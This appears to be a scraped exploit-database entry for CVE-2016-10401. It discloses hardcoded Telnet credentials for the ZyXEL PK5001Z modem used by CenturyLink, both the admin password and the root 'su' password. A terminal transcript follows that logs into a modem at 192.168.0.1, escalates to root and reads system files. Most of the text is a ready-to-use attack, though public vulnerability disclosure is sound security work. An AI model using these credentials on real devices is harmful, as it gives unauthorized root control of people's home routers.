39 lines
No EOL
1 KiB
Text
39 lines
No EOL
1 KiB
Text
# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
|
|
# Google Dork: n/a
|
|
# Date: 2017-10-31
|
|
# Exploit Author: Matthew Sheimo
|
|
# Vendor Homepage: https://www.zyxel.com/
|
|
# Software Link: n/a
|
|
# Version: PK5001Z 2.6.20.19
|
|
# Tested on: Linux
|
|
# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world.
|
|
# Linked CVE's: CVE-2016-10401
|
|
|
|
|
|
Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet
|
|
|
|
username: admin
|
|
password: CenturyL1nk
|
|
|
|
Escalate to root with 'su' and this password.
|
|
|
|
password: zyad5001
|
|
|
|
|
|
[root:/]# telnet 192.168.0.1
|
|
Trying 192.168.0.1...
|
|
Connected to 192.168.0.1.
|
|
Escape character is '^]'.
|
|
|
|
PK5001Z login: admin
|
|
Password: CenturyL1nk
|
|
$ whoami
|
|
admin_404A03Tel
|
|
$ su
|
|
Password: zyad5001
|
|
# whoami
|
|
root
|
|
# uname -a
|
|
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
|
|
# cat /etc/zyfwinfo
|
|
Vendor Name: ZyXEL Communications Corp. |